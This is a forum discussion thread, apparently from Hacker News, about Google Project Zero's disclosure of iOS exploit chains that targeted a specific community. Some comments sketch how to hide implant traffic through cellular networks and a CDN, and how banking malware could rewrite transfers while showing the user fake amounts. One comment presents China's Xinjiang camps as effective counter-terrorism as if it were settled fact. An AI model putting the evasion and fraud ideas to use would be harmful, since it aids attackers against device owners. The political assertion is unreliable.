Outside of the great tech writeup, what is particularly interesting about this, to me, from a geopolitical perspective is the level of restraint.
The malicious actors in this case leveraged zero-days for iOS for years and yet do not seem to have overextended themselves or risk exposure by overly widening their intended targets. What I mean by this is: they clearly could have chosen to gain a massive infection rate by combining this with hacking a well-known popular site, or even pulling more visits from (say) social media, but instead the malicious actor chose to limit their intended recipients to run the exploits for a smaller set of targets for much longer while remaining undetected.
This, to me, hints at a state-actor with specific intent.
Crazy that the Implant was never detected directly on a phone. It's certainly visible to iOS itself, but apparently iOS isn't looking for unexpected processes running on the phone. As well, the Implant is sending network traffic that no one ever noticed or never tracked down. And presumably it has some affect on battery life. But all of this just disappears into the noise of everything else going on on an iPhone.
I wonder if the Implant ever showed up in any of the crash reports collected by iOS and uploaded to Apple.
It's a user-facing option: https://support.apple.com/en-us/HT202100
I'm the tech lead for my company's in-house mobile app crash reporter. Every so often we get reports that make no sense. Sometimes they are corrupted in strange ways which I just chalked up to bad device memory or storage, but who knows if something like this wasn't the cause. Semi-related, but I used to have jailbreak detection in the crash reporter SDKs but I had to remove it. Just attempting to detect a jailbroken device was in some cases causing the SDK to crash because the anti-jailbreak detection code injected into the app was buggy.
I wonder how many people you would need to infect, on average, until you were detected?
I would guess, with this exploit chain, and the lack of auditing available of iOS internals, that the actual exploit could run 1 Billion + times before detection. The biggest risk is someone noticing the wedged webkit renderer process and going to try and debug it. I bet that causes oddities when hooked up to a mac with devtools open.
Of the whole thing, the HTTP network traffic is probably by far the biggest red flag - and perhaps 1 out of 10 million people might notice/investigate that. Simple things like never connecting over wifi (cell network is far harder to sniff), and redirecting traffic, encrypted, via a popular CDN would be a good way to hide it.
True, but wouldn't that lead western three letter agencies to an account with a credit card attached? Sure, criminals can get stolen cards, but I imagine those have a limited lifespan and chasing after payment problems is not what the hacker wants to be doing.
For a 3 letter agency, legal issues might be the bigger hurdle. E.g. you might have to make sure the data passing though the CDN and thus CDN itself isn't in some other justification when spying on your own cities.
Isn't that a problem with the iOS walled garden, not even security researchers can properly investigate users devices and detect infections like this, like they can with desktop operating systems...?
I suppose it depends on how "special" they are—do they run standard iOS with normal Safari and actual apps?
NB I heard some infosec research companies actually get rooted phones from Apple with some big caveats.
It’s on us - the end user.
no, please don‘t tell me about android. that‘s a fucked up mine field altogether.
we need to remember that there is no and will never be 100% security. while not open — which is worth nothing to the average user — we get pretty close with ios given all we know.
Is there a particular region of the world or community where this specific list makes most sense?
So the suspects are countries that fight against the autonomy of a region where the population is ethnically different. The most obvious suspect is China: they have gulag camps in Xinjiang where Uygurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic in China is Han, and Uygurs have been oppressed for decades.
Of course, other countries could do this, but the probabilty of Birmania/Rohingya, SaudiArabia/Yemen… seems much lower. On a side note, Voxer seems to be quite proeminent in China, according to the popularity of their Android app[^3].
However, with the spread of Salafism  in that region, China started to suffer multiple terrorist attacks a year. With the worst resulting in 35 deaths and hundreds injured .
As a result, to stop these terrorist attacks, China started these de-radicalization centres. Since then, there have been no attacks.
But China doesn't need exploits to spy on their iPhone-using citizens, right? Because Apple has been cooperating with the Chinese government.
Line is mostly used in Japan, Signal is mostly used by nerds. So you can assume neither japanese peopel nor nerd were their primary target. Given that this is true for the vast majority of the world population I'd not call this odd.
By contrast, Telegram has a quick selection of the last few pictures available immediately, and the general picker opens quicker if you request it -- maybe because it's using the stock iOS picker rather than the custom one Signal implements?
Since sending a picture to a contact was a super common action of mine, this was incredibly frustrating.
Signal also had notification issues if I was running the desktop client at the same time. It'd sometimes clear notifications from my phone before I'd actually read them in either location.
> The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.
Tremendously unlikely, PRISM was something very different from this.
I doubt they'd have written such shoddy and simple implant code though. At a minimum, they would have encrypted the data uploaded, since intelligence agencies love to steal data from other intelligence agencies, and sniffing wires I'm sure isn't unique to the USA.
edit: their implant is compiled unoptimized, has NSLog statements, serializes data by writing everything as files to /tmp (a "rather odd design pattern", as Ian Beer put it), in addition to the http issue just described. The implant/C2 code was likely written by a separate, less experienced team, than the one that wrote the exploit chains (which might have simply been purchased?).
But agreed it was probably purchased from some vuln dev and put together by some hack gov employee with some Microsoft certifications or (far less likely) some indifferent blackhat with powerful weapons well out of his scope, although 'black market zero day markets' are mostly non-existent hype. Especially for multiple iOS vulns. There's a good reason the cost of those exploits is so high given the low level of programming talent around in security.
Watering holes + "targeting sub-communities" typically mean spies hitting up some conference website or industry news thing. Who knows what country they are in and how sophisticated their local CS people are.
Awful at using good design patterns, unit tests, and neat code maybe... But not "write everything to /tmp, tar it up and upload it cleartext".
Even the most basic infosec folk will be aware to not do that - what this does is, as others have said, reveal that the developers were not the ones who found the exploit - it was likely simply purchased.
Hehe, I have an idea, it is kind of crazy so I assign it <10% probability but if I where right it seems to kind of work:
We all "know" that well funded three letter agencies wouldn't let shoddy work like this pass.
As long as you aren't afraid that anyone will capture it in transit this is a good way to avoid suspicion.
Which could explain why it was so overdone, to make sure everybody sees how unlikely it is that a state actor have done it.
Not only does the attacker have no one they care about hiding from, but also: the lack of encryption is a secondary attack.
Sure, when Vizio did this, it was probably incompetence...but here...trivially encrypting data is simple stuff, why not do it here when siphoning large streams of personal data?
Because third parties using this data to attack the tracked victims doesn’t hurt the attacker, it in fact helps them. From the state sponsored actor’s perspective, they are merely using these exploits to track minorities and dissidents, but hey, if a third party happens to find this info and use it and that keeps the victims spun up and less effective at organizing? Win-win.
The only way to be safe is probably to access your financial sites from a browser running inside a VM, maybe even a dedicated laptop, and never sync the passwords to anywhere outside the VM unencrypted.
These folks don't want money.
And statue protects you from fraud - just set up text and email alerts so large transactions alert you ASAP.
These folks may not want money, but the phone is vulnerable and the next set of folks may. Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?
I think the nation states that will want to use them will clamp down hard on two bit hustlers who interrupt the fun.
Orders of magnitude more 0-days on whatever software is running on that laptop than on iOS.
This is bad advice.
What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website site is not (by itself) a threat to everything on your computer or other sites you visit.
Even when it comes to "more 0-days", I think you're probably missing the point. There's a lot more software written for computers that can be compromised than just the handful of programs that comprise iOS, so the raw count is not very meaningful. More practically, I'm willing to bet the odds my (Linux) laptop is compromised are far lower than my phone. I don't install apps I don't trust on my computer, but I have little choice but to on my phone.
Both would require a 0-day exploit to be a threat.
Just because the attacks are dumb.
If your computer is pwned, it should wait for you to 2FA, and then when you "log out"-- don't, do malicious stuff instead.
If the device you are using is compromised, you're in for a bad time.
You could send some simple transaction summary to the other device to acknowledge, which is getting better. Even so that doesn't completely eliminate the opportunity for tomfoolery.
When user tries to transfer $1,000 of cash from user's investment account to user's bank account, instead, initiate transferring $100,000 to EvilGuy's bank account. Rewrite elements so it appears that $1,000 is being transferred to user's bank account, and wait for user to receive their 2FA code and authenticate. This may be as easy as string replacement both ways.
Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.
This is a fallacy. Rather than assessing the security of the linux kernel or linux distributions you're making taking an assumption about linux users and transferring the blame for their insecure practices onto linux itself.
Think of it this way: If a random Windows user that didn't engage in such behavior was to switch to linux it's unlikely that would suddenly change. If the linux kernel and system programs are more secure than windows that make linux a good choice if that person cares about security.
Note: I'm not making a statement about the security of linux/windows, just pointing out a flaw in the above argument.
I was responding to that assumption made by the parent:
> people who run laptops using linux probably have more security in the laptop than on their phone
When you run an application on iOS or Android, it doesn't have those capabilities. It can only get them through security exploits. In theory it should be similar to looking at a web page. If a web page is able to read arbitrary files, that's obviously a bug in the system. If an application on your laptop is able to read arbitrary files, that's standard functionality.
Apps that keep all this data locally, as is common on phones, are dangerous. Add the fact that most people have a phone as their two factor and you have a really bad situation when a phone is compromised. This, alone, makes phones an attractive target.
Meaning the session cookies are stored on your computer, meaning I can steal those and then do whatever nefarious things I want to do off-box. Locality is a myth, attackers don't care about that. They just want the data, and finding/weaponizing bugs is the hard part.
Speaking of native applications, usually many regular users still use native native applications for email, chat, text processing, spreadsheets, etc.
So while you specifically might take care of having a very clean $HOME, most people don't.
If compromised, the attacker doesn't get a long log of comms, just a week's worth.
If they had send some OAuth tokens for a honeypot gmail account to the C&C server used for these attacks, they could then track the usage patterns of that token, and find all the other attacked users. Perhaps thats how they identified who was being attacked?
We already know that ISPs routinely hijack your DNS queries to snarf your search queries, inject ads, redirect you to cached versions of big sites to “speed up your experience”, warn you of virus infection, etc etc.
It would be trivial for a state actor to use the same mechanism to redirect you to a site that, say, looks like Google, passes your search query to Google, retuns Google, but also serves up the js that pushes the implant.
Really pushes the issue that everyone — especially activists and targeted minority groups — need to be educated about DNS and proper VPN usage (a misconfigured VPN would not help here), and it would be awesome if device makers made checking and verifying this stuff easier for normal-grade users.
I'm not a sophisticated state actor, but I were going to try to deliver a message to a group of people, I'd use ad networks to target the geography or population that I was interested in. A bad actor could easily get a shitty ad network to deliver all sorts of payloads.
But yeah, absolutely, great point - shitty ads are doable AND geo-targetable!
"To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)
...and then if you think about what's been going on in Hong Kong recently -- search iPhone and Hong Kong in both languages and you'll find some interesting posts on Twitter that appear not to want folks to know that:
"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)
...it kind of reveals itself.
If nothing else, that would be a pretty good guess, given that amateurs don't have the skill to come up with "five separate, complete and unique iPhone exploit chains", and a professional team with the skill to create them is either going to report the vulnerabilities (white hat) or sell them on the black market, or at least try to infect a large number of people. The specificity of putting them on a single website with only "thousands" of views per week suggests that someone wanted to target visitors of that site specifically, not just for financial gain.
I'm surprised Apple doesn't talk more about how they're continuously upgrading the security of iPhones with new chip generations. I remember the BlackHat presentation on iPhone security from a few years ago  also found that there were attacks on older iPhones which didn't work on the (then-)newer ones. Is Apple afraid it will give the impression that existing phones are not secure?
It also isn’t difficult to infer what a “code signing bypass” is, so I guess being arrested is a good excuse to buy a new phone? (Assuming we’re talking about a state based actor, in control of the territory you live in)
According to this (taken soon after iPhone XS/XR went on sale) this is not true: https://www.statista.com/statistics/755593/iphone-model-devi...
The downside of Android being an open platform is that Google is limited in forcing vendors to update their devices - and most do not. That said, Android has had regular monthly security releases for years, and the Pixel devices are excellent from a security perspective. Google also monitors its app store - as well as the full Android ecosystem (as far as Google Play Services is installed) for potentially harmful applications. This is why you regularly see articles along the lines of "Google removes malware from the Play Store that has had X installs!"
I'd say the biggest vulnerability for Android users given its impressive scale is a vulnerability in a vendor's supply chain. Given the complexity of devices, a vendor likely has multiple places where a malicious actor could insert malware into an Android device. I think this is why US intel has ultimately decided devices from China - Huawei in particular - are untrustworthy. If you can't validate every component of a device and trust the vendor will always audit its security, then it's hard to trust a device, even if it is safe right now.
"The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. "
“The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device.
The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running.
There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear.”
“they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.”
So not only your photos, contacts, msgs are stollen but then they are sent to attacker on http so the data is logged probably on every router, modem and wifi sniffers.
Even if a C&C server is taken down, they would still be able to persist the data.
Google does research into making it hard for attackers to compromise user devices. That is the purpose of PZ team. There are no numbers because nobody has these numbers except for the attacker. I am guessing Google has some ball park numbers based on search traffic or web analytics.
If you want to know if you were affected, you need to ask yourself if powerful adversary wants access to your data, possibly because of civil unrest occurring in their territory; and if you visit strange websites related to this. Only the adversary knows for sure, not Apple, Not Google.
Surely that would be a pretty big giveaway for the user - "I was just browsing round the bombmaking-for-dummies webpage, and my browser just froze, and I had to kill it and reopen it".
So, no this is not a big giveaway.
Unless something on the Youtube site targeted my own and most of my friends' iOS devices, of course.
“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.”
I'm not opposed to jailbreaking to check.
I would recommend checking your login history / OAuth permissions to anything you had in your keychain, changing passwords for anything critical you used on your device if you suspect you were infected, a restart won't undo stolen information.
It’s likely that my devices were owned and on display for hackers in my local community. This article is a reminder of the trauma experienced as a result of the paranoia and mistrust I experienced, and a reminder that we are not to trust our consumer devices to really care about our privacy.
If Apple cared about user security they’d build robust defenses into the devices that empower the end user to have a degree of confidence regarding security. Instead, the iPhone on which I’m typing could be at this time could be 100% owned and leaking data in real time and I’m afforded no visual indication of that possibility. The camera and microphone could be hot and transmitting and Apple refuses to offer any way to confirm this in a robust, hardware-visual, unhackable way. That computer camera activity led’s can be hacked (or could be in previous iterations) is indicative of the level of irresponsibility going on.
The blob that is the combination of a modem that interacts with cell towers, and the vastly complex computer tied to it, affords zero insight into what the phone is doing or whether it is betraying me.
And, such privacy breaches are enough to ruin lives. World is full of malicious folks who enjoy hurting others if they can get away with it.
- how did they know your name / for whom to look up these hacked messages?
- how did they know where to find these hacked messages?
- why would they reveal their ability to watch your every move by repeating your private messages?
- even if they had all of these capabilities and no shame about letting you know, why on earth would they care enough to look at your messages?
The scenario you’re convinced happened sounds completely bizarre, and gives me some strong Terry Davis vibes (no disrespect to him - that’s the person he became due to his illness).
So similar to Stagefright?
Wow Google. Like I applaud the Project Zero program and its goals but you never write this sort of stuff when discussing your android vulnerabilities. This is just petty.
After reading the disclosure policy, this vulnerability must have been fixed already. I'm guessing this has been fixed in iOS 12.4 or even before?
What's interesting is that (for most of these cases) I find that I can understand the process of the reverse engineering, but I am completely stupefied as to the process of the initial implementation. I understand finding relatively superficial vulnerabilities (e.g., an SQL injection attack ), but I don't understand how these vulnerabilities are found when they are so many layers deep.
If anyone has an insight I would really appreciate it.
You don't have to wait until you find a JS exploit to start work on a payload achieving further privilege escalation, you use existing development tools and privileges.
And what's really so different in concert between SQL injection and the lack of proper checks on the binary data header field in the beginning of the first post?
One of the latter posts in the linked series goes through how the initial stage stuff is in one case taken verbatim from the JS test case in the webkit commit fixing the bug (and only reaching users months later).
(Not at all saying it's not incredibly impressive or that I could do any of it, haha)
Poking a hole in the sandbox for "security" or "auditing" seems a bit risky.